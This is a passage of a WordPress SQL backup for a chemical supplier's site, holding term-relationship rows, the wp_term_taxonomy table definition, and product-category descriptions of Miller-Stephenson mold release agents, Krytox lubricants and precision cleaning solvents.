INSERT INTO `wp_term_relationships` VALUES (1713, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1713, 364, 0); 
INSERT INTO `wp_term_relationships` VALUES (1713, 367, 0); 
INSERT INTO `wp_term_relationships` VALUES (1713, 368, 0); 
INSERT INTO `wp_term_relationships` VALUES (1713, 369, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 374, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 375, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 376, 0); 
INSERT INTO `wp_term_relationships` VALUES (1719, 377, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 378, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 379, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 380, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 381, 0); 
INSERT INTO `wp_term_relationships` VALUES (1722, 511, 0); 
INSERT INTO `wp_term_relationships` VALUES (1724, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1724, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1724, 382, 0); 
INSERT INTO `wp_term_relationships` VALUES (1724, 383, 0); 
INSERT INTO `wp_term_relationships` VALUES (1726, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1726, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1726, 374, 0); 
INSERT INTO `wp_term_relationships` VALUES (1726, 375, 0); 
INSERT INTO `wp_term_relationships` VALUES (1726, 384, 0); 
INSERT INTO `wp_term_relationships` VALUES (1729, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1729, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1729, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1729, 385, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 395, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 396, 0); 
INSERT INTO `wp_term_relationships` VALUES (1801, 397, 0); 
INSERT INTO `wp_term_relationships` VALUES (1819, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1819, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1819, 150, 0); 
INSERT INTO `wp_term_relationships` VALUES (1819, 190, 0); 
INSERT INTO `wp_term_relationships` VALUES (1819, 412, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 443, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 444, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 445, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 446, 0); 
INSERT INTO `wp_term_relationships` VALUES (1834, 447, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 243, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 340, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 413, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 414, 0); 
INSERT INTO `wp_term_relationships` VALUES (1836, 415, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 243, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 340, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 415, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 416, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 417, 0); 
INSERT INTO `wp_term_relationships` VALUES (1840, 418, 0); 
INSERT INTO `wp_term_relationships` VALUES (1851, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1851, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1851, 371, 0); 
INSERT INTO `wp_term_relationships` VALUES (1851, 419, 0); 
INSERT INTO `wp_term_relationships` VALUES (1851, 420, 0); 
INSERT INTO `wp_term_relationships` VALUES (1852, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1852, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (1852, 421, 0); 
INSERT INTO `wp_term_relationships` VALUES (1852, 422, 0); 
INSERT INTO `wp_term_relationships` VALUES (1852, 423, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1865, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 176, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 431, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1866, 433, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 176, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 431, 0); 
INSERT INTO `wp_term_relationships` VALUES (1868, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1872, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (1976, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (2049, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 205, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 222, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 456, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 457, 0); 
INSERT INTO `wp_term_relationships` VALUES (2050, 458, 0); 
INSERT INTO `wp_term_relationships` VALUES (2056, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2056, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2056, 459, 0); 
INSERT INTO `wp_term_relationships` VALUES (2056, 460, 0); 
INSERT INTO `wp_term_relationships` VALUES (2056, 461, 0); 
INSERT INTO `wp_term_relationships` VALUES (2062, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (2068, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (2152, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (2226, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2226, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (2226, 463, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 464, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 465, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 466, 0); 
INSERT INTO `wp_term_relationships` VALUES (2277, 467, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 468, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 469, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 470, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 471, 0); 
INSERT INTO `wp_term_relationships` VALUES (2302, 472, 0); 
INSERT INTO `wp_term_relationships` VALUES (2305, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2305, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2305, 458, 0); 
INSERT INTO `wp_term_relationships` VALUES (2305, 473, 0); 
INSERT INTO `wp_term_relationships` VALUES (2308, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2308, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2308, 205, 0); 
INSERT INTO `wp_term_relationships` VALUES (2308, 474, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 205, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 468, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 475, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 476, 0); 
INSERT INTO `wp_term_relationships` VALUES (2311, 477, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 336, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 391, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 451, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 482, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 483, 0); 
INSERT INTO `wp_term_relationships` VALUES (2312, 528, 0); 
INSERT INTO `wp_term_relationships` VALUES (2317, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2317, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2317, 478, 0); 
INSERT INTO `wp_term_relationships` VALUES (2317, 479, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 220, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 473, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 480, 0); 
INSERT INTO `wp_term_relationships` VALUES (2322, 481, 0); 
INSERT INTO `wp_term_relationships` VALUES (2344, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2344, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (2344, 233, 0); 
INSERT INTO `wp_term_relationships` VALUES (2344, 484, 0); 
INSERT INTO `wp_term_relationships` VALUES (2375, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2375, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2375, 202, 0); 
INSERT INTO `wp_term_relationships` VALUES (2381, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2381, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2381, 456, 0); 
INSERT INTO `wp_term_relationships` VALUES (2381, 485, 0); 
INSERT INTO `wp_term_relationships` VALUES (2390, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2390, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2390, 220, 0); 
INSERT INTO `wp_term_relationships` VALUES (2390, 485, 0); 
INSERT INTO `wp_term_relationships` VALUES (2390, 486, 0); 
INSERT INTO `wp_term_relationships` VALUES (2410, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2410, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2410, 487, 0); 
INSERT INTO `wp_term_relationships` VALUES (2410, 488, 0); 
INSERT INTO `wp_term_relationships` VALUES (2442, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2442, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2442, 490, 0); 
INSERT INTO `wp_term_relationships` VALUES (2450, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2450, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2450, 491, 0); 
INSERT INTO `wp_term_relationships` VALUES (2460, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2460, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (2460, 492, 0); 
INSERT INTO `wp_term_relationships` VALUES (2460, 520, 0); 
INSERT INTO `wp_term_relationships` VALUES (2469, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (2474, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2474, 493, 0); 
INSERT INTO `wp_term_relationships` VALUES (2474, 494, 0); 
INSERT INTO `wp_term_relationships` VALUES (2474, 495, 0); 
INSERT INTO `wp_term_relationships` VALUES (2474, 496, 0); 
INSERT INTO `wp_term_relationships` VALUES (2503, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2503, 497, 0); 
INSERT INTO `wp_term_relationships` VALUES (2503, 498, 0); 
INSERT INTO `wp_term_relationships` VALUES (2503, 499, 0); 
INSERT INTO `wp_term_relationships` VALUES (2507, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2507, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (2507, 500, 0); 
INSERT INTO `wp_term_relationships` VALUES (2528, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (2552, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2618, 212, 0); 
INSERT INTO `wp_term_relationships` VALUES (2618, 223, 0); 
INSERT INTO `wp_term_relationships` VALUES (2618, 224, 0); 
INSERT INTO `wp_term_relationships` VALUES (2618, 501, 0); 
INSERT INTO `wp_term_relationships` VALUES (2668, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (2694, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2694, 508, 0); 
INSERT INTO `wp_term_relationships` VALUES (2741, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2741, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (2741, 502, 0); 
INSERT INTO `wp_term_relationships` VALUES (2741, 517, 0); 
INSERT INTO `wp_term_relationships` VALUES (2746, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2746, 102, 0); 
INSERT INTO `wp_term_relationships` VALUES (2746, 502, 0); 
INSERT INTO `wp_term_relationships` VALUES (2746, 517, 0); 
INSERT INTO `wp_term_relationships` VALUES (2763, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2763, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (2769, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2769, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (2771, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2771, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (2773, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2773, 505, 0); 
INSERT INTO `wp_term_relationships` VALUES (2773, 506, 0); 
INSERT INTO `wp_term_relationships` VALUES (2782, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2782, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (2788, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2788, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (2795, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2795, 94, 0); 
INSERT INTO `wp_term_relationships` VALUES (2800, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (2800, 340, 0); 
INSERT INTO `wp_term_relationships` VALUES (2869, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2869, 507, 0); 
INSERT INTO `wp_term_relationships` VALUES (2869, 508, 0); 
INSERT INTO `wp_term_relationships` VALUES (2886, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2886, 508, 0); 
INSERT INTO `wp_term_relationships` VALUES (2936, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (2936, 508, 0); 
INSERT INTO `wp_term_relationships` VALUES (2978, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (2989, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3015, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (3036, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3064, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3089, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (3152, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3160, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3187, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (3190, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (3237, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3358, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3358, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (3363, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3363, 12, 0); 
INSERT INTO `wp_term_relationships` VALUES (3363, 510, 0); 
INSERT INTO `wp_term_relationships` VALUES (3512, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (3524, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (3606, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3606, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (3610, 512, 0); 
INSERT INTO `wp_term_relationships` VALUES (3706, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3706, 514, 0); 
INSERT INTO `wp_term_relationships` VALUES (3710, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3710, 515, 0); 
INSERT INTO `wp_term_relationships` VALUES (3719, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3719, 515, 0); 
INSERT INTO `wp_term_relationships` VALUES (3722, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3722, 515, 0); 
INSERT INTO `wp_term_relationships` VALUES (3724, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3724, 515, 0); 
INSERT INTO `wp_term_relationships` VALUES (3726, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3744, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3753, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3760, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3767, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (3787, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3787, 20, 0); 
INSERT INTO `wp_term_relationships` VALUES (3985, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3985, 524, 0); 
INSERT INTO `wp_term_relationships` VALUES (3989, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (3989, 524, 0); 
INSERT INTO `wp_term_relationships` VALUES (4090, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4090, 524, 0); 
INSERT INTO `wp_term_relationships` VALUES (4170, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4170, 523, 0); 
INSERT INTO `wp_term_relationships` VALUES (4186, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4186, 523, 0); 
INSERT INTO `wp_term_relationships` VALUES (4219, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (4288, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4288, 529, 0); 
INSERT INTO `wp_term_relationships` VALUES (4326, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4326, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (4331, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (4336, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4336, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (4402, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4402, 529, 0); 
INSERT INTO `wp_term_relationships` VALUES (4420, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (4433, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4434, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4435, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4436, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4437, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4438, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4439, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4441, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4442, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4578, 1, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 411, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 482, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 526, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 530, 0); 
INSERT INTO `wp_term_relationships` VALUES (4593, 531, 0); 
INSERT INTO `wp_term_relationships` VALUES (4607, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (4607, 20, 0); 
INSERT INTO `wp_term_relationships` VALUES (4792, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (4815, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (4817, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (4854, 6, 0); 
INSERT INTO `wp_term_relationships` VALUES (4860, 117, 0);
#
# End of data contents of table `wp_term_relationships`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_term_taxonomy`


#
# Delete any existing table `wp_term_taxonomy`
#

DROP TABLE IF EXISTS `wp_term_taxonomy`;


#
# Table structure of table `wp_term_taxonomy`
#

CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=532 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_term_taxonomy`
#
 
INSERT INTO `wp_term_taxonomy` VALUES (1, 1, 'category', '', 0, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (2, 2, 'product_type', '', 0, 291); 
INSERT INTO `wp_term_taxonomy` VALUES (3, 3, 'product_type', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (4, 4, 'product_type', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (5, 5, 'product_type', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (6, 6, 'nav_menu', '', 0, 18); 
INSERT INTO `wp_term_taxonomy` VALUES (7, 7, 'nav_menu', '', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (8, 8, 'product_cat', '<h2>Mold Release Agents | Miller-Stephenson</h2>\r\n<h3>Release Agents | Semi-Permanent Mold Release Agents | PTFE Mold Release Agents</h3>\r\nMiller-Stephenson\'s mold release agents are backed by over 50 years of research and development and are relied upon by global industries to ensure the efficient, cost-effective, and high-quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have developed specialized release agent formulations for manufacturing operations such as<strong> <a href="https://www.miller-stephenson.com/composite-mold-release-agents/">composite/FRP molding</a>, <a href="https://www.miller-stephenson.com/rubber-mold-release/">elastomer and rubber molding</a>, <a href="https://www.miller-stephenson.com/polyurethane-mold-release-agents/">polyurethane and extrusion PU</a>, <a href="https://www.miller-stephenson.com/composite-mold-release-agents/">mandrel lay-ups, vacuum bag molding</a>,</strong> rotational, compression, and injection molding, etc. Our mold release agents are optimized to maximize throughput and efficiency of the critical parts you mold; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation. Moreover, all of our formulations are 100% non-flammable, minimal odor, and low to no VOC and are available as eco-friendly water-based formulations. Miller-Stephenson specializes in providing water-based release agents which offer superior performance, safety and greatly reduced environmental impact. Utilizing the most technological advanced mold release systems, Miller-Stephenson will help molders maximize releases per application, throughput and minimize defects and scrap rates, <strong> </strong><a href="https://www.miller-stephenson.com/mold-release-agents-which-is-right-for-you/">For more information about which mold release agent is right for you to go to our guide</a> or for <a href="https://www.miller-stephenson.com/mold-release-application-guide/">guidance on proper mold preparation and release agent application<strong>.</strong></a>\r\n\r\nWhy are Release Agents such a critical part of a molding companies operations? Mold release coatings provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place, the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are numerous release agents chemistries, Miller-Stephenson focuses on the development and refinement of the most robust and advanced polymers, specifically focusing on PTFE (polytetrafluoroethylene), and reactive polysiloxanes.\r\n<h3>Critical performance criteria for release agents to meet is the following:</h3>\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip &amp; Ease of release</li>\r\n 	<li>Chemical inertness to the molding process</li>\r\n 	<li>Numerous releases per application</li>\r\n 	<li>Minimal or No Transfer</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency, and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately, these sacrificial agents must be re-applied after each molding cycle and will contaminate he molded part.  This results in time-consuming cleaning of the molded part and dramatic limitations in productivity. Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxane resins, like <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys™</a></strong>. ReleaSys, is our newest and most robust release agent product line.  Utilization of cutting-edge, thin-film polymer technology combined with our dedication to environmentally friendly water-based formulations, Miller-Stephenson has developed the most advanced release agent coatings that will outperform every other release agent, <em><span style="text-decoration: underline;">guaranteed!</span></em>. ReleaSys has proven itself to be highest performing and most cost-effective release agent system in numerous head-to-head comparisons against other industry-standard coatings.  Combining ReleaSys release agents with our advanced ShieldSys Mold Sealer coatings, only further enhances the value-proportion, efficiency, durability, and number of releases per application. For more information about utilizing our ShieldSys Mold Sealer system follow the link provided.\r\n\r\n<span style="text-decoration: underline;">Miller-Stephenson specializes in providing only the highest performing and cost-effective release agent solutions for it customers, our companies specializes in providing PTFE and reactive polysiloxane coatings.</span>  Our company is 100% back-integrated meaning our manufacturing, inventory, and quality is maintained regardless of fluctuations in the market. Our proprietary chemistry, robust R&amp;D department, and rapid development team can provide your production with a distinct  release agent tailored for your specific performance requirements.  Miller-Stephenson has spent countless hours on the production floor with molding engineers refining our formulations so that we can offer you most efficient and cost-effective release coatings.\r\n<h4><strong>Semi-Permanent Release Agents</strong></h4>\r\nThe <strong>ReleaSys™</strong> product line is Miller-Stephenson\'s most advanced, semi-permanent release systems which maximizes releases per application while minimizing transfer and fouling.\r\n<h4><strong>PTFE Release Agents</strong></h4>\r\nMiller-Stephenson\'s MS-122 / MS-143 series offers high-performance mold release solutions utilizing low molecular weight PTFE (polytetrafluoroethylene) and proprietary surface activation.\r\n<h4><strong>High-Temperature Release Agents</strong></h4>\r\nMiller-Stephenson offers to release solutions for molding operations which operate at temperatures exceeding 1562°F / 842°C.\r\n\r\n[share title=""]', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (9, 9, 'product_cat', 'Krytox™ Lubricants Discovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nOriginally developed for the U.S. Space Program, Krytox Performance Lubricants are a family of fluorinated synthetic oils and PTFE thickened greases that perform where conventional lubricants fail. Krytox Lubricants exhibit superior lubricity, high load carrying ability and extra wear protection. Excellent for high temperature applications and chemically aggressive environments. Available in general purpose, mil-spec grade and food grades. Some lubricants also have a National Stock Number.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. Krytox oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). Krytox perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, Krytox is the lubricant of choice for extreme conditions and performance.', 149, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (10, 10, 'product_cat', 'Not all industrial cleaners have kept pace with the increasing demands for purity and regulatory restricitions in high technology industries. As electronic systems have become smaller and more complex, chemical purity has become even more critical. Miller-Stephenson offers ultra high-purity, non-flammable, and high cleaning efficiency solvents for variety of industries and specifications.  We offer VOC exempt and low or no GWP based solvent systems to meet all current and future regulatory specifications. From Electronic, Aerospace, and Military to Vapor Degreasing applications, Miller-Stephenson has the right solution for your specific application and requirements.\r\n', 0, 0); 
